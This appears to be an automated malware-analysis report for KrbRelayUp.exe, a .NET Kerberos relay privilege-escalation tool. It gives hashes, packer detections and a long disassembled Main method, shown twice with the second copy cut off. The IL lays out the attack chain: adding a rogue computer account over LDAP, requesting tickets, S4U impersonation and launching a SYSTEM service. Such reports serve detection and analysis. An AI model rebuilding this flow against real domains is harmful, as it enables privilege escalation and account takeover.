Suspicious
Suspect

6b6ee63e1b57405281275a7bcfba6f91

PE Executable
|
MD5: 6b6ee63e1b57405281275a7bcfba6f91
|
Size: 1.11 MB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Medium

Hash
 Hash Value
MD5
6b6ee63e1b57405281275a7bcfba6f91
Sha1
8b4e7306a489827edf13be549ce5649abe15ade8
Sha256
a84d2731983b2f9765bdc2048d1108aa69c7d926bbb57a6cea60de7d3002de1b
Sha384
168735e3befb776606b1c7c9a1f60e07fc06f829925a0babd393c476a39248d8f2e8c8482e4a6a9b5460abffc644d01e
Sha512
7be9182a5c2f9aedbbac5ca8e5a0f214d782523cd9d31e8428ae0a7d002ba163f9075a8b1382ccad1869cedbb897e81d1cfe8048ea890d9fc2b537f3a691bb9b
SSDeep
24576:/Ud4OjAlC+9nHLmX63wZSGBI/u0+eW81ATw89rgX6BCYICX:/mHsl99nrmXOFp/HJW8ilIC
TLSH
9235D02437E88F1BE5AE0735F071151507F2F422A672E79F6A81D0AA2E83751ED10BB7

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
UPolyX 0.3 -> delikon
File Structure
6b6ee63e1b57405281275a7bcfba6f91
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
KrbRelayUp.DSInternals.Common.Properties.Resources.resources
bouncycastle.crypto
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

KrbRelayUp.exe
Full Name

KrbRelayUp.exe
EntryPoint

System.Void KrbRelayUp.Program::Main(System.String[])
Scope Name

KrbRelayUp.exe
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

KrbRelayUp
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

1250
Main Method

System.Void KrbRelayUp.Program::Main(System.String[])
Main IL Instruction Count

658
Main IL

ldstr KrbRelayUp - Relaying you to SYSTEM call System.Void System.Console::WriteLine(System.String) ldarg.0 <null> call System.Void KrbRelayUp.Program::ParseArgs(System.String[]) ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase brtrue.s IL_002A: ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldarg.0 <null> ldc.i4.1 <null> ldelem.ref <null> call System.Int32 System.Convert::ToInt32(System.String) call System.Void KrbRelayUp.KrbSCM::RunSystemProcess(System.Int32) leave.s IL_0029: ret pop <null> leave.s IL_0029: ret ret <null> ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.3 <null> bne.un.s IL_0038: ldsfld System.String KrbRelayUp.Options::domain call System.Void KrbRelayUp.KrbSCM::Run() ret <null> ldsfld System.String KrbRelayUp.Options::domain call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0050: call System.Boolean KrbRelayUp.Networking::GetDomainInfo() ldsfld System.String KrbRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_0058: ldsfld System.String KrbRelayUp.Options::domainController call System.Boolean KrbRelayUp.Networking::GetDomainInfo() brtrue.s IL_0058: ldsfld System.String KrbRelayUp.Options::domainController ret <null> ldsfld System.String KrbRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_008A: ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldsfld System.String KrbRelayUp.Options::domainController call System.String KrbRelayUp.Networking::GetDCNameFromIP(System.String) stsfld System.String KrbRelayUp.Options::domainController ldsfld System.String KrbRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_008A: ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldstr [-] Could not find Domain Controller FQDN From IP. Try specifying the FQDN with --DomainController flag. call System.Void System.Console::WriteLine(System.String) ret <null> ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.1 <null> beq.s IL_009D: call System.Void System.Console::WriteLine() ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> bne.un IL_0335: ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase call System.Void System.Console::WriteLine() ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.3 <null> bne.un.s IL_00D6: ldstr "ldap/" ldsfld System.String KrbRelayUp.Options::caEndpoint call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_00C0: ldstr "http/" ldsfld System.String KrbRelayUp.Options::domainController stsfld System.String KrbRelayUp.Options::caEndpoint ldstr http/ ldsfld System.String KrbRelayUp.Options::caEndpoint call System.String System.String::Concat(System.String,System.String) stsfld System.String KrbRelayUp.Options::relaySPN br.s IL_00EA: ldsfld System.String KrbRelayUp.Options::domain ldstr ldap/ ldsfld System.String KrbRelayUp.Options::domainController call System.String System.String::Concat(System.String,System.String) stsfld System.String KrbRelayUp.Options::relaySPN ldsfld System.String KrbRelayUp.Options::domain call System.String KrbRelayUp.Networking::GetDomainDN(System.String) stsfld System.String KrbRelayUp.Options::domainDN call System.Void KrbRelayUp.Relay.Relay::InitializeCOMServer() ldsfld System.String KrbRelayUp.Options::domainController ldsfld System.Int32 KrbRelayUp.Options::ldapPort newobj System.Void System.DirectoryServices.Protocols.LdapDirectoryIdentifier::.ctor(System.String,System.Int32) newobj System.Void System.DirectoryServices.Protocols.LdapConnection::.ctor(System.DirectoryServices.Protocols.LdapDirectoryIdentifier) stloc.0 <null> ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Sealing(System.Boolean) ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Signing(System.Boolean) ldloc.0 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapConnection::Bind() ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.1 <null> bne.un IL_0330: call System.Void KrbRelayUp.Relay.Relay::Run() ldsfld System.Boolean KrbRelayUp.Options::rbcdCreateNewComputerAccount brfalse IL_031B: ldloc.0 ldsfld System.String KrbRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_015E: newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() ldc.i4.s 16 call System.String KrbRelayUp.Program::RandomPasswordGenerator(System.Int32) stsfld System.String KrbRelayUp.Options::rbcdComputerPassword newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() stloc.1 <null> ldloc.1 <null> ldstr CN= ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldstr ,CN=Computers, ldsfld System.String KrbRelayUp.Options::domainDN call System.String System.String::Concat(System.String,System.String,System.String,System.String) callvirt System.Void System.DirectoryServices.Protocols.AddRequest::set_DistinguishedName(System.String) ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr objectClass ldstr Computer newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr SamAccountName ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr userAccountControl ldstr 4096 newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr DnsHostName ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String KrbRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr ServicePrincipalName ldc.i4.4 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr HOST/ ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String KrbRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr RestrictedKrbHost/ ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String KrbRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr HOST/ ldsfld System.String KrbRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr RestrictedKrbHost/ ldsfld System.String KrbRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Object[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr unicodePwd call System.Text.Encoding System.Text.Encoding::get_Unicode() ldstr " ldsfld System.String KrbRelayUp.Options::rbcdComputerPassword ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Byte[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.0 <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryResponse System.DirectoryServices.Protocols.DirectoryConnection::SendRequest(System.DirectoryServices.Protocols.DirectoryRequest) pop <null> ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] Computer account " stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $" added with password " stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerPassword stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) leave.s IL_031B: ldloc.0 stloc.2 <null> ldstr [-] Could not add new computer account: call System.Void System.Console::WriteLine(System.String) ldstr [-] ldloc.2 <null> callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) leave IL_07BF: ret ldloc.0 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldsfld System.String KrbRelayUp.Options::domainDN call System.String KrbRelayUp.Program::GetObjectSidForComputerName(System.DirectoryServices.Protocols.LdapConnection,System.String,System.String) stsfld System.String KrbRelayUp.Options::rbcdComputerSid call System.Void KrbRelayUp.Relay.Relay::Run() ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.2 <null> beq.s IL_0352: ldnull ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> bne.un IL_07BF: ret ldsfld System.Boolean KrbRelayUp.Options::attackDone brfalse IL_07BF: ret ldnull <null> stloc.3 <null> ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.1 <null> bne.un IL_0581: ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.0 <null> stloc.s V_4 ldnull <null> stloc.s V_5 ldsfld System.String KrbRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03D0: ldsfld System.String KrbRelayUp.Options::rbcdComputerPasswordHash ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String KrbRelayUp.Options::domain callvirt System.String System.String::ToUpper() stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr host stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName callvirt System.String System.String::ToLower() stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr . stelem.ref <null> dup <null> ldc.i4.4 <null> ldsfld System.String KrbRelayUp.Options::domain callvirt System.String System.String::ToLower() stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_8 ldc.i4.s 18 ldsfld System.String KrbRelayUp.Options::rbcdComputerPassword ldloc.s V_8 ldc.i4 4096 call System.String KrbRelayUp.Crypto::KerberosPasswordHash(KrbRelayUp.Interop/KERB_ETYPE,System.String,System.String,System.Int32) stloc.s V_5 ldc.i4.s 18 stloc.s V_4 br.s IL_03E7: ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldsfld System.String KrbRelayUp.Options::rbcdComputerPasswordHash call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03E7: ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldsfld System.String KrbRelayUp.Options::rbcdComputerPasswordHash stloc.s V_5 ldc.i4.s 23 stloc.s V_4 ldsfld System.String KrbRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String KrbRelayUp.Options::domain ldloc.s V_5 ldloc.s V_4 ldnull <null> ldc.i4.0 <null> ldstr ldloca.s V_9 initobj KrbRelayUp.lib.Interop.LUID ldloc.s V_9 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.0 <null> ldc.i4.1 <null> ldnull <null> call System.Byte[] KrbRelayUp.AskTGT::TGT(System.String,System.String,System.String,KrbRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,KrbRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.Boolean,System.String) newobj System.Void KrbRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_6 ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_046C: ldloc.s V_6 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_6 callvirt System.Byte[] KrbRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_6 ldsfld System.String KrbRelayUp.Options::impersonateUser ldsfld System.String KrbRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call KrbRelayUp.KRB_CRED KrbRelayUp.S4U::S4U2Self(KrbRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,KrbRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_7 ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_0502: ldloc.s V_6 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String KrbRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_7 callvirt Asn1.AsnElt KrbRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_6 ldsfld System.String KrbRelayUp.Options::impersonateUser ldsfld System.String KrbRelayUp.Options::targetSPN ldnull <null> ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldstr ldloc.s V_7 ldc.i4.0 <null> ldnull <null> call System.Byte[] KrbRelayUp.S4U::S4U2Proxy(KrbRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,KrbRelayUp.KRB_CRED,System.Boolean,System.String) stloc.3 <null> ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse IL_0730: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) br IL_0730: ldc.i4 1500 ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.2 <null> beq.s IL_0594: call System.String System.Environment::get_MachineName() ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.3 <null> bne.un IL_0730: ldc.i4 1500 call System.String System.Environment::get_MachineName() ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String KrbRelayUp.Options::domain ldsfld System.String KrbRelayUp.Options::shadowCredCertificate ldsfld System.String KrbRelayUp.Options::shadowCredCertificatePassword ldc.i4.s 18 ldnull <null> ldc.i4.0 <null> ldstr ldsfld System.Boolean KrbRelayUp.Options::verbose stloc.s V_12 ldloca.s V_9 initobj KrbRelayUp.lib.Interop.LUID ldloc.s V_9 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldloc.s V_12 ldnull <null> call System.Byte[] KrbRelayUp.AskTGT::TGT(System.String,System.String,System.String,System.String,KrbRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,KrbRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.String) newobj System.Void KrbRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_10 ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_0628: ldloc.s V_10 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_MachineName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_10 callvirt System.Byte[] KrbRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_10 ldsfld System.String KrbRelayUp.Options::impersonateUser ldsfld System.String KrbRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call KrbRelayUp.KRB_CRED KrbRelayUp.S4U::S4U2Self(KrbRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,KrbRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_11 ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_06BE: ldloc.s V_11 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String KrbRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_11 callvirt Asn1.AsnElt KrbRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_11 ldsfld System.String KrbRelayUp.Options::targetSPN ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldloca.s V_9 initobj KrbRelayUp.lib.Interop.LUID ldloc.s V_9 call System.Byte[] KrbRelayUp.LSA::SubstituteTGSSname(KrbRelayUp.KRB_CRED,System.String,System.Boolean,KrbRelayUp.lib.Interop.LUID) stloc.3 <null> ldsfld System.Boolean KrbRelayUp.Options::verbose brfalse.s IL_0730: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String KrbRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String KrbRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldc.i4 1500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> beq.s IL_0749: call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() ldsfld System.Boolean KrbRelayUp.Options::useCreateNetOnly brfalse.s IL_07BA: call System.Void KrbRelayUp.KrbSCM::Run() call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() ldstr krbscm call System.String System.String::Concat(System.String,System.String) stloc.s V_13 ldsfld System.String KrbRelayUp.Options::serviceName call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0788: ldsfld System.String KrbRelayUp.Options::serviceCommand ldloc.s V_13 ldstr --ServiceName " ldsfld System.String KrbRelayUp.Options::serviceName ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_13 ldsfld System.String KrbRelayUp.Options::serviceCommand call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_07AC: ldloc.s V_13 ldloc.s V_13 ldstr --ServiceCommand " ldsfld System.String KrbRelayUp.Options::serviceCommand ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldnull <null> ldnull <null> ldnull <null> ldloc.3 <null> call KrbRelayUp.lib.Interop.LUID KrbRelayUp.Helpers::CreateProcessNetOnly(System.String,System.Boolean,System.String,System.String,System.String,System.Byte[]) pop <null> ret <null> call System.Void KrbRelayUp.KrbSCM::Run() ret <null>
Module Name

KrbRelayUp.exe
Full Name

KrbRelayUp.exe
EntryPoint

System.Void KrbRelayUp.Program::Main(System.String[])
Scope Name

KrbRelayUp.exe
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

KrbRelayUp
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

1250
Main Method

System.Void KrbRelayUp.Program::Main(System.String[])
Main IL Instruction Count

658
Main IL

ldstr KrbRelayUp - Relaying you to SYSTEM call System.Void System.Console::WriteLine(System.String) ldarg.0 <null> call System.Void KrbRelayUp.Program::ParseArgs(System.String[]) ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase brtrue.s IL_002A: ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldarg.0 <null> ldc.i4.1 <null> ldelem.ref <null> call System.Int32 System.Convert::ToInt32(System.String) call System.Void KrbRelayUp.KrbSCM::RunSystemProcess(System.Int32) leave.s IL_0029: ret pop <null> leave.s IL_0029: ret ret <null> ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.3 <null> bne.un.s IL_0038: ldsfld System.String KrbRelayUp.Options::domain call System.Void KrbRelayUp.KrbSCM::Run() ret <null> ldsfld System.String KrbRelayUp.Options::domain call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0050: call System.Boolean KrbRelayUp.Networking::GetDomainInfo() ldsfld System.String KrbRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_0058: ldsfld System.String KrbRelayUp.Options::domainController call System.Boolean KrbRelayUp.Networking::GetDomainInfo() brtrue.s IL_0058: ldsfld System.String KrbRelayUp.Options::domainController ret <null> ldsfld System.String KrbRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_008A: ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldsfld System.String KrbRelayUp.Options::domainController call System.String KrbRelayUp.Networking::GetDCNameFromIP(System.String) stsfld System.String KrbRelayUp.Options::domainController ldsfld System.String KrbRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_008A: ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldstr [-] Could not find Domain Controller FQDN From IP. Try specifying the FQDN with --DomainController flag. call System.Void System.Console::WriteLine(System.String) ret <null> ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.1 <null> beq.s IL_009D: call System.Void System.Console::WriteLine() ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase ldc.i4.4 <null> bne.un IL_0335: ldsfld KrbRelayUp.Options/PhaseType KrbRelayUp.Options::phase call System.Void System.Console::WriteLine() ldsfld KrbRelayUp.Relay.RelayAttackType KrbRelayUp.Options::relayAttackType ldc.i4.3 <null> bne.un.s IL_00D6: ldstr "ldap/" ldsfld System.String KrbRelayUp.Options::caEndpoint call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_00C0: ldstr "http/" ldsfld System.String KrbRelayUp.Options::domainController stsfld System.String KrbRelayUp.Options::caEndpoint ldstr http/ ldsfld System.String KrbRelayUp.Options::caEndpoint call System.String System.String::Concat(System.String,System.String) stsfld System.String KrbRelayUp.Options::relaySPN br.s IL_00EA: ldsfld System.String KrbRelayUp.Options::domain ldstr ldap/ ldsfld System.String KrbRelayUp.Options::domainController call System.String System.String::Concat(System.String,System.String) stsfld System.String KrbRelayUp.Options::relaySPN ldsfld System.String KrbRelayUp.Options::domain call System.String KrbRelayUp.Networking::GetDomainDN(System.String) stsfld System.String KrbRelayUp.Options::domainDN call System.Void 